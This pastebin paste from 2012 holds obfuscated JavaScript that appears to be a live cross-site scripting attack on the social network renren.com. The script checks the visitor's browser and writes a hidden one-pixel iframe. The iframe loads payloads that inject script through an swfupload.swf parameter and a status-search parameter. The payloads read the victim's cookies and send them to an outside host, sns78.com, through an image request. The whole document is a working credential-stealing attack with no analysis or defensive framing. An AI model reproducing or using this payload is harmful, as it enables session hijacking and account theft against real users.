Don't like ads? PRO users don't see any ads ;-)
Guest

Untitled

By: a guest on Jun 13th, 2012  |  syntax: JavaScript  |  size: 2.23 KB  |  hits: 71  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
This paste has a previous version, view the difference. Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. var _$=["360se",
  2. "undefined",
  3. "firefox",
  4. "chrome",
  5. "http://upload.renren.com/pages/album/swfupload.swf?movieName=%22])}catch(e){c=document.cookie;c=c.replace(/;%20/g,%22;taobyme%22);document.write(%27%3Cimg%20src=%22http://www.sns78.com/1.php?c=%27%2bc%2b%27%22%20/%3E%27)}//",
  6. "",
  7. "",
  8. "http://upload.renren.com/pages/album/swfupload.swf?movieName=%22%5D%29%7Dcatch%28e%29%7Blocation.href%3D%27javascript%3A%22%3Cscript%3Evar%20c%3Ddocument.cookie%3Bc%3Dc.replace%28%2F%3B%20%2Fg%2C%5C%27%3Btaobyme%5C%27%29%3Bdocument.write%28%5C%27%3Cimg%20src%3Dhttp%3A%2F%2Fwww.sns78.com%2F1.php%3Fc%3D%5C%27%252Bc%252B%5C%27%20%2F%3E%5C%27%29%3C%2Fscript%3E%22%27%7D%2F%2F",
  9. "",
  10. "",
  11. "#//status/status/hot/list?word=<iframe/onload=%27c=document.cookie;c=c.replace(/;%20/g,%22;taobyme%22);document.write(%22<img/src=http://www.sns78.com/1.php?c=%22%2bc%2b%22%5Cx20%5Cx2f%5Cx3e%22)%27>",
  12. "http://guide.renren.com",
  13. "http://guide.renren.com/guide",
  14. "renren.com/",
  15. "",
  16. "http://www.renren.com/",
  17. "http://upload.renren.com/pages/album/swfupload.swf?movieName=%22%5D%29%7Dcatch%28e%29%7Blocation.href%3D%27javascript%3A%22%3Cscript%3Evar%20c%3Ddocument.cookie%3Bc%3Dc.replace%28%2F%3B%20%2Fg%2C%5C%27%3Btaobyme%5C%27%29%3Bdocument.write%28%5C%27%3Cimg%20src%3Dhttp%3A%2F%2Fwww.sns78.com%2F1.php%3Fc%3D%5C%27%252Bc%252B%5C%27%20%2F%3E%5C%27%29%3C%2Fscript%3E%22%27%7D%2F%2F",
  18. "<iframe WIDTH=\"1\" HEIGHT=\"1\" src=\"\",
  19. "\"></iframe>"];
  20. var from = document.referrer;
  21. var UA = navigator.userAgent;
  22. is360se = UA.toLowerCase().indexOf(_$[0]) > -1 ? true : false;
  23. if (typeof window.opera != _$[1] || UA.toLowerCase().indexOf(_$[2]) >= 0 || UA.toLowerCase().indexOf(_$[3]) >= 0) {
  24.     xss = _$[4]
  25. } else if (is360se == true) {
  26.     var location = _$[5];
  27.     var navigate = _$[6];
  28.     xss = _$[7]
  29. } else {
  30.     var location = _$[8];
  31.     var navigate = _$[9];
  32.     var xss = _$[10];
  33.     if (from.indexOf(_$[11]) >= 0) {
  34.         xss = _$[12] + xss
  35.     } else {
  36.         var n = from.match(/renren.com\/\d{0,20}/g);
  37.         if (n != null) {
  38.             var n = String(n);
  39.             var a = n.replace(_$[13], _$[14]);
  40.             xss = _$[15] + a + xss
  41.         } else {
  42.             xss = _$[16]
  43.         }
  44.     }
  45. };
  46. document.write(_$[17] + xss + _$[18]);